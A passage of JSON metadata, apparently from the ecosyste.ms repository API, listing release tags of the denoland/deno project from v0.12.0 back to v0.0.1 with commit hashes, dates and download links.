https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.12.0/manifests"},{"name":"v0.11.0","sha":"92ac616708cb067a1b895283913c5ecd25c6d873","kind":"tag","published_at":"2019-07-07T16:19:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.11.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.11.0/manifests"},{"name":"v0.10.0","sha":"c56df45355c8e68eabbfa62021e7ca7484115c0b","kind":"tag","published_at":"2019-06-25T14:11:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.10.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.10.0/manifests"},{"name":"v0.9.0","sha":"7b06aa37342c021f9f1fac99125847d134e67001","kind":"commit","published_at":"2019-06-15T16:04:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.9.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.9.0/manifests"},{"name":"v0.8.0","sha":"d60bdb6350f2583e35d020f6cebb6aa30262fbcc","kind":"commit","published_at":"2019-06-08T19:16:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.8.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.8.0/manifests"},{"name":"v0.7.0","sha":"5265bd7cb1f86af99b01d73c537d52a50df95fe2","kind":"commit","published_at":"2019-05-29T22:42:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.7.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.7.0/manifests"},{"name":"v0.6.0","sha":"22feb74ba12215597416b5531f8a557302283e79","kind":"commit","published_at":"2019-05-20T19:22:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.6.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.6.0/manifests"},{"name":"v0.5.0","sha":"23aca36d52220efbfbc07abbe165bd2c9ade2009","kind":"commit","published_at":"2019-05-11T21:19:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.5.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.5.0/manifests"},{"name":"v0.4.0","sha":"2aae09c2b869bf5d0bc5fd269464e8ac504528ea","kind":"commit","published_at":"2019-05-03T23:33:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.4.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.4.0/manifests"},{"name":"v0.3.11","sha":"3b1e2f1ad42cfebb6f2568e54c82c5ac3c8fe3d4","kind":"commit","published_at":"2019-05-03T22:05:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.11","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.11/manifests"},{"name":"v0.3.10","sha":"40d8ef1ec9f5e50017c41af8bf3b9f8454f97544","kind":"tag","published_at":"2019-04-25T20:00:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.10","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.10/manifests"},{"name":"v0.3.9","sha":"e725b26b289fbe96b679039ba4203f10f7229ab9","kind":"tag","published_at":"2019-04-25T15:46:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.9","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.9/manifests"},{"name":"v0.3.8","sha":"0796a8f2f75005df95ef6115a4bdf6dd66e58dc3","kind":"commit","published_at":"2019-04-19T15:41:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.8","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.8/manifests"},{"name":"v0.3.7","sha":"8584d80cfd26111825af5a69fc6ae4c367ad0700","kind":"commit","published_at":"2019-04-11T19:35:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.7","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.7/manifests"},{"name":"v0.3.6","sha":"744e56cb58f90acde7baf8811676021fb55b2f2a","kind":"tag","published_at":"2019-04-04T14:04:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.6","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.6/manifests"},{"name":"v0.3.5","sha":"b965c7ab367a417fb7bdde2eaf38312179e5c183","kind":"commit","published_at":"2019-03-28T20:58:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.5","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.5/manifests"},{"name":"v0.3.4","sha":"223a2adbb46cb33e75ffe861ecaff6ff7e6d555e","kind":"commit","published_at":"2019-03-20T22:54:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.4","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.4/manifests"},{"name":"v0.3.3","sha":"3dbb06e699398549e8cfabc896ef3256ab433cba","kind":"tag","published_at":"2019-03-13T18:16:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.3/manifests"},{"name":"v0.3.2","sha":"535037b519711d238dc0bfa2c4d2ffb4b17dec53","kind":"commit","published_at":"2019-03-07T02:22:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.2/manifests"},{"name":"v0.3.1","sha":"b0c7b54f692ecc866d4f70bfa384631523bbf924","kind":"commit","published_at":"2019-02-27T21:20:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.1/manifests"},{"name":"v0.3.0","sha":"a5720d9e28f7ee5868049504816405392c2821d7","kind":"commit","published_at":"2019-02-19T04:22:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.0/manifests"},{"name":"v0.2.11","sha":"b2fb8261e700c75cfb9a626ae57bbd3098e08454","kind":"commit","published_at":"2019-02-09T04:34:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.11","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.11/manifests"},{"name":"v0.2.10","sha":"c3241822522fb2b13792fe5666596888057cf829","kind":"commit","published_at":"2019-02-02T23:26:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.10","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.10/manifests"},{"name":"v0.2.9","sha":"1681bda14d1552860645e40f91f667accefe50cb","kind":"commit","published_at":"2019-01-30T03:57:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.9","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.9/manifests"},{"name":"v0.2.8","sha":"a47d545e4d0831713d0107e86cead7b4506a9bf6","kind":"commit","published_at":"2019-01-19T16:54:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.8","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.8/manifests"},{"name":"v0.2.7","sha":"eb4a19ef6ef1c5ae797fb515c45627deca65cf31","kind":"commit","published_at":"2019-01-15T01:25:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.7","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.7/manifests"},{"name":"v0.2.6","sha":"404e6f86345216c9205cabb88b19eaca762095e0","kind":"commit","published_at":"2019-01-07T22:33:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.6","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.6/manifests"},{"name":"v0.2.5","sha":"320577c131c8058ba0065f26119ce1ce18bc23d2","kind":"commit","published_at":"2019-01-01T19:30:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.5","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.5/manifests"},{"name":"v0.2.4","sha":"c6e2fffc1388cdb4411d6c2cff36c4febb7c75d5","kind":"commit","published_at":"2018-12-24T04:39:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.4","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.4/manifests"},{"name":"v0.2.3","sha":"c69d2f554d05ba9e4d09af6ae451ce5676876e61","kind":"commit","published_at":"2018-12-14T20:11:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.3/manifests"},{"name":"v0.2.2","sha":"e6121762f8bf3c531c4c60229ff4a156ae21d931","kind":"commit","published_at":"2018-12-07T22:44:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.2/manifests"},{"name":"v0.2.1","sha":"b5c6bfa0c8a3df9598211bc68db5408f5eec147d","kind":"commit","published_at":"2018-12-01T00:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.1/manifests"},{"name":"v0.2.0","sha":"d083f7271b11d87ddba90869d2bcd2cf312e77af","kind":"commit","published_at":"2018-11-16T05:23:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.0/manifests"},{"name":"v0.1.12","sha":"0c740ff85d855177d1619276154f63a36ed31557","kind":"commit","published_at":"2018-11-12T17:16:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.12","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.12/manifests"},{"name":"v0.1.11","sha":"e1d5f82d36f08b9c7a7c6233b7ce354a5cf82836","kind":"commit","published_at":"2018-11-05T22:51:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.11","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.11/manifests"},{"name":"v0.1.10","sha":"da959e8c878382ce3417ab61db8ccf1ae9a660fa","kind":"commit","published_at":"2018-10-27T15:13:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.10","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.10/manifests"},{"name":"v0.1.9","sha":"c85311dd7dbad09242633d2ee7a83fdb1cbd1d7f","kind":"commit","published_at":"2018-10-21T00:30:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.9","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.9/manifests"},{"name":"v0.1.8","sha":"d92c99eabaf28100a8d181b6f289e2e3fc295107","kind":"commit","published_at":"2018-10-12T18:44:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.8","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.8/manifests"},{"name":"v0.1.7","sha":"5307aa94e14d99a226366a275e011a60161c9c39","kind":"commit","published_at":"2018-10-04T12:56:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.7","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.7/manifests"},{"name":"v0.1.6","sha":"77e876388bf1b2b3959f25a1cb057a1f96c76ba7","kind":"commit","published_at":"2018-09-29T17:36:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.6","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.6/manifests"},{"name":"v0.1.5","sha":"8e958d3ad68e610061e82fb9f456eab79330633e","kind":"commit","published_at":"2018-09-22T03:21:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.5","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.5/manifests"},{"name":"v0.1.4","sha":"d38b3b585ca68f4bc9e95faa6c9c036dc8982575","kind":"commit","published_at":"2018-09-13T00:45:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.4","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.4/manifests"},{"name":"v0.1.3","sha":"59f3fca166e7d3bd3095f9df0f7040defe3239e1","kind":"commit","published_at":"2018-09-06T03:08:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.3/manifests"},{"name":"v0.1.2","sha":"cce3bd470b19e1c2eab6530d06c48949891a56fc","kind":"commit","published_at":"2018-08-30T22:29:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.2/manifests"},{"name":"v0.1.1","sha":"c42e4ddbb7973bfb0c57a49ab6bf6dc432baad7e","kind":"commit","published_at":"2018-08-28T13:37:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.1/manifests"},{"name":"v0.1.0","sha":"68d388229ea6ada339d68eb3d67feaff7a31ca97","kind":"commit","published_at":"2018-08-23T14:37:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.0/manifests"},{"name":"v0.0.3","sha":"ca4ace6b1f054593029df4958538708c2fbbabc2","kind":"commit","published_at":"2018-08-22T16:08:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.0.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.3/manifests"},{"name":"v0.0.2","sha":"6a8fbc8b522a710699bcf9738c2194dec797b428","kind":"commit","published_at":"2018-08-21T03:43:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.0.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.2/manifests"},{"name":"v0.0.1","sha":"67d89ff692a88ae42145043eac1a5c58413ae110","kind":"commit","published_at":"2018-08-17T16:58:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.0.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.1","manifests_url":"https: